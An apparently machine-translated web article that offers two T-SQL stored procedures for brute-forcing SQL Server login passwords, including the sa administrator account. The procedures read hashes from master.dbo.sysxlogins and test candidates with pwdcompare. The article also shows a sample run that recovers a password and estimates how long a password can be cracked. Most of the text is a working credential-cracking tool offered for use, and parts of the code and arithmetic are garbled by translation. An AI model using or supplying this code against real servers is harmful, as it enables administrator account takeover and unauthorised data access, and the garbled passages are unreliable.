MSSQL uses stored procedures to crack sa password _mssql

The code demonstrates brute force to crack the account and password of MSSQL, including the password of the Administrator account SA.

SQL Server sa password cracking stored procedures on the Internet, the method is to brute force to crack the number and password of MSSQL, including the password of the administrator account SA, I have a little modification to the other code, and some performance analysis.

First of all, to break the core idea of the program is to store account password Master.dbo.sysxlogins table and unpublished password comparison stored procedure pwdcompare. After a side analysis, modified part of the code, the following post changes before and after the code,

A stored procedure for SQL Server sa password cracking

Copy Code code as follows:

ALTER PROC P_getpassword
@username sysname=null, user name, if not specified, list all users
@pwdlen int=2-the number of digits of the password to be cracked, by default 2-bit and below
As
Set @pwdlen =case when IsNull (@pwdlen, 0) <1 then 1 else @pwdlen-1 End
Select Top 255 id=identity (int,0,1) to #t from syscolumns
ALTER TABLE #t add constraint pk_#t primary key (ID)
Select Name,password
, type=case when xstatus&2048=2048 then 1 else 0 end
, jm=case when password are null then 1 else 0 end
, Pwdstr=cast (' as sysname ')
, Pwd=cast (' as varchar (8000))
Into #pwd
From Master.dbo.sysxlogins A
where srvid is null
and Name=isnull (@username, name)
DECLARE @s1 varchar (8000), @s2 varchar (8000), @s3 varchar (8000)
DECLARE @l int
Select @l=0
, @s1 = ' char (aa.id) '
, @s2 = ' cast (aa.id as varchar) '
, @s3 = ', #t AA '
EXEC ('
Update pwd Set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
From #pwd pwd ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', Pwd.password,pwd.type) =1
')
While exists (select 1 from #pwd where jm=0 and @l< @pwdlen)
Begin
Select @l=@l+1
, @s1 = @s1 + ' +char (' +char (@l/26+97) +char (@l%26+97) + '. Id ') '
, @s2 = @s2 + ' + ', ' +cast (' +char (@l/26+97) +char (@l%26+97) + '. ID as varchar) '
, @s3 = @s3 + ', #t ' +char (@l/26+97) +char (@l%26+97)
EXEC ('
Update pwd Set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
From #pwd pwd ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', Pwd.password,pwd.type) =1
')
End
Select User name =name, password =pwdstr, password ascii=pwd
From #pwd
Go

Here is my revised code:

Copy Code code as follows:

ALTER PROC P_GETPASSWORD2
@username sysname=null, user name, if not specified, list all users
@pwdlen int=2-the number of digits of the password to be cracked, by default 2-bit and below
As
SET NOCOUNT ON

If object_id (N ' tempdb). #t ') is not null
drop table #t
If object_id (N ' tempdb). #pwd ') is not null
drop table #pwd

Set @pwdlen =case when IsNull (@pwdlen, 0) <1 then 1 else @pwdlen-1 End

DECLARE @ss varchar (256)
--select @ss = ' 123456789 '
Select @ss = ' ABCDEFGHIJKLMNOPQRSTUVWXYZ '
Select @ss = @ss + ' 0123456789-=[]\;,./'
Select @ss = @ss + ' ~!@#$%^&* () _+{}|:<>?
--select @ss = @ss + ' abcdefghijklmnopqrstuvwxyz '

    CREATE table #t (c char (1) NOT NULL)
    ALTER TABLE #t add constraint pk_#t Primar Y key CLUSTERED (c)
    declare @index int
    Select @index =1
     while (@index <=len (@ss))
    begin
        Insert #t Select SUBSTRING (@ss, @index, 1)
        Select @index = @index +1
& nbsp;   End

Select Name,password
, type=case when xstatus&2048=2048 then 1 else 0 end
, jm=case when password are null then 1 else 0 end
, Pwdstr=cast (' as sysname ')
, Pwd=cast (' as varchar (8000))
, Times =cast (' as varchar (8000))
Into #pwd
From Master.dbo.sysxlogins A
where srvid is null
and Name=isnull (@username, name)
DECLARE @s1 varchar (8000), @s2 varchar (8000), @s3 varchar (8000), @stimes varchar (8000)

declare @l int, @t bigint

Select @t = count (1) *power (Len (@ss), 1) from #pwd

    Select @l=0
       , @s1 = ' aa.c '
        , @s2 = ' cast (ASCII (AA.C) as varchar) '
       , @s3 = ', #t AA '
       , @stimes = ' 1th, ' + cast (@t as varchar) + ' rows '

    exec ('
        update pwd set jm=1,pwdstr= ' + @s1 + '
       , pwd= ' + @s2 + '
        from #pwd PWD ' + @s3 + '
        where pwd.jm=0
         and Pwdcompare (' + @s1 + ', pwd.password,pwd.type) =1
        ')
     while exists (select 1 from #pwd where jm=0 and @l< @pwdlen)
    begin
  &n bsp;     Select @l=@l+1
        Select @t = count (1) *power (Len (@ss), @l+1) from #pwd
        print @t

        Select
        @s1 = @s1 + ' + ' + char (@l/26+97) +char (@l%26+97) + '. C '
       , @s2 = @s2 + ' + ', ' +cast (ASCII (' + char (@l/26+97) +char (@l%26+97) + '. C "as varchar) '
       , @s3 = @s3 + ', #t ' +char (@l/26+97) +char (@l%26+97)
       , @stimes = @stimes + '; + CAST (@l+1 as varchar (1)) + ' th, ' + cast (@t as varchar) + ' rows '

EXEC ('
Update pwd Set jm=1,pwdstr= ' + @s1 + '
, pwd= ' + @s2 + '
, times= ' + @stimes + '
From #pwd pwd ' + @s3 + '
where pwd.jm=0
and Pwdcompare (' + @s1 + ', Pwd.password,pwd.type) =1
')
End
Select username =name, password =pwdstr, password ascii=pwd, number of queries and lines =times
From #pwd

If object_id (N ' tempdb). #t ') is not null
drop table #t
If object_id (N ' tempdb). #pwd ') is not null
drop table #pwd

I tested the following

Copy Code code as follows:

P_getpassword2 ' B ', 6

Username Password Password ASCII query number and number of lines
B 123 49,50,51 1th,66rows;2th,4356rows;3th,287496rows

Performance Analysis:

In this example, a query can query the maximum value of the bigint record 9223372036854775807 to do the main machine maximum performance, to rough calculation cracking performance.

Crack an account password length, crack time and performance consumption, is based on all the characters used to crack the end of the length of the password index function, that is: Crack account number * (all used to crack the number of characters) the longest password length of the second party < host maximum performance:

The original stored procedure uses 256 crack characters, theoretically can crack 7-bit password, namely 2567<max (bigint).
I modified the stored procedure using 66 keyboard regular characters, theoretically can crack 10-bit password, namely 6610<max (bigint).
If you know that the password is a combination of 10 numeric characters, you can theoretically crack a 19-bit password, that is, 1019<max (bigint).